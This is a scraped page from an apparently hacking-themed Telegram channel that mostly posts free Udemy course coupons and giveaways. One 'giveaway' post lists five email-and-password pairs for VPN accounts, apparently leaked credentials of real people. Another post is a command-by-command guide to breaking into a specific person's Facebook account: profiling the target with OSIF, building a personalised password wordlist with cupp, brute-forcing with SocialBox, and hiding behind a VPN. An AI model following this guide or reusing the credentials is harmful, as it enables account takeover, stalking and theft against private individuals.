HACK TECH COURSES
94 subscribers
305 photos
3 videos
11 files
314 links
🌟Get Unlimited Free Online Courses🌟
🀩With just a click🀩
πŸ”₯Hacking
πŸ”₯ML
πŸ”₯AI
πŸ”₯Python
πŸ”₯Java
πŸ”₯Web-development
πŸ”₯Android
πŸ”₯Photoshop, etc..

Join Our Discussion Group πŸ˜‰ : https://t.me/joinchat/yrgV8b-LdTcwNmU1
Download Telegram
Crash Course on C++ Standard Template Library (STL)

FREE For 48 Hrs

First step to master Data structures.

https://www.udemy.com/course/crash-course-on-cpp-stl/?couponCode=HAPPYLEARNING21

βž–βž– @Free_Online_Udemy_Courses βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
Complete JAVASCRIPT with HTML5,CSS3 from zero to Expert-2021

FREE For 48 Hrs

Learn HTML5, CSS3, JavaScript, jQuery and Bootstrap framework by building a modern looking responsive website.

https://www.udemy.com/course/build-responsive-website-using-html5-css3-js-and-bootstrap-p/?couponCode=PROGRAMMERS

βž–βž– @Free_Online_Udemy_Courses βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
Passive income for programmers

FREE For 48 Hrs

Learn how to create passive income as a programmer

https://www.udemy.com/course/passive-income-for-programmers/?couponCode=PASSIVEINCOME202103

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
❣Guys Γ—5 Nord VPN Premium Account Giveaway❣
______________________________

πŸ”°
Coming At 3 P.M.πŸ”°
______________________________


✨Unmute And Pin Channel on Top✨

--------------------------------------------------------------

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
❣×5 Nord VPN Premium Acc. Giveaway❣

EMAIL : lovercash@msn.com
PASS : Jameson2017
Exp Date = 2023-03-01

EMAIL : killerzee@aol.com
PASS : Camaro786
Exp Date = 2023-06-08

EMAIL : gpdipalma@gmail.com
PASS : djgpdp1515
Exp Date = 2023-04-28

EMAIL : surcouf64@msn.com
PASS : hardrockdu64
Exp Date = 2023-04-05

Email : chandorman@gmail.com
Pass : namrod717
Exp Date = 2023-05-21

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
Reverse Engineering: Create Your Own GUI CrackMe using C++

FREE For 48 Hrs

The fun way to learn how to build windows GUI programs by creating your own crackme's for reverse engineering

https://www.udemy.com/course/reverse-engineering-create-crackme/?couponCode=RECKMAR2

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
❀️HOW TO HACK A FACEBOOK ACCOUNT❀️

✨Requirements:
- Termux
- 200 MB space
- Facebook target link
- Info about target
- Root

πŸ”°Setup:
$ apt install nodejs -y

$ pkg install git tsu -y

$ apt install python python2 -y

$ apt update; apt upgrade -y

$ npm install --global facebook-id-of

1️⃣ Getting ID

The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.

On the target profile, we can see URL like this:
https://www.facebook.com/michael.schmidt.7965692 β€” Remove the hyperlink and copy online name after facebook.com/.

$ facebook-id-of michael.schmidt.7965692

β€Ί Facebook ID of michael.schmidt.7965692 is 671393100

2️⃣ Dumping Information About Target

For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.

$ pkg update upgrade

$ pkg install git python2

$ git clone https://github.com/ciku370/OSIF

$ cd OSIF

$ pip2 install -r requirements.txt

❗️For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. (TARGET MUST EXIST IN FRIEND LIST)

$ python2 osif.py
D3b2y >> token
Type username (email) & Password.

D3b2y >> cat_token
[*]Your access token !!

Setup done now Hype

D3b2y >> dump_id
D3b3y >> dump_671393100

❗️If you know your targets e-mail, it's much easier to attack them from the Β»bruteforceΒ« tool.

D3b3y Β» dump_mail

Now on to creating a wordlist for bruteforcing

🚨While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.

$ git clone https://github.com/Mebus/cupp.git; cd cupp/

$ python3 cupp.py -i

After tool has been started, fill out the information which you have dumped with OSIF.
It's asking :
> Do you want to add some key words about the victim? Y/[N]: y

> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson

> Do you want to add special chars at the end of words? Y/[N]: n

> Do you want to add some random numbers at the end of words? Y/[N]:y

> Leet mode? (i.e. leet = 1337) Y/[N]: y

$ cp -R test.txt $HOME

🚨Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.
❗️These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.

🚨It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.

Bruteforcing the account

$ pkg install nano -y

$ git clone https://github.com/TunisianEagles/SocialBox.git; cd SocialBox; chmod +x *.sh

$ nano install-sb.sh

Edit all sudo lines, only remove sudo:
sudo apt-get update
After:
apt update

Exit β€” ctrl+x β€” y (yes) β€” enter.

$ ./install-sb.sh

$ cp -R $HOME/test.txt $PWD

$ ./SocialBox.sh

❗️CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :

Choice > 1
Enter Facebook ID / Email / Username / Number: 671393100
Enter wordlist path : $HOME/cupp/test.txt

🚨Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!

❣SHARE AND SUPPORT US❣

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
⚑️GRAMMARLY ACCOUNT GIVEAWAY ⚑️

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
⚑️ Task : First 10 Members to send the code will win

CODE: HACK_TECH

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

πŸ”₯Double Tap To CopyπŸ”₯

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–

🎯 SEND CODE TO :- @HACK_TECH_GIVEAWAY_bot

βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–


🎯DONT DM ME FOR FREE ACCS OR U WILL BLOCKED 😑

🎯AFTER LOGIN SEND SCREENSHOT TO MY BOT OR ELSE NO GIVEAWAYS

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”°DATA STRUCTURE WITH PYTHONπŸ”°

FREE For 48 Hrs

The All-In-one Course for you to Conquer Data Structures with Python

https://www.udemy.com/course/data-structures-with-python/?couponCode=FREE2021PYTHON3

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM
✨Best Tips to Improve your coding skills in college 2021✨

https://blog.cyberstructor.net/improve-your-coding-skills-during-college/

βž–βž– @Hack_Tech_Course βž–βž–
This media is not supported in your browser
VIEW IN TELEGRAM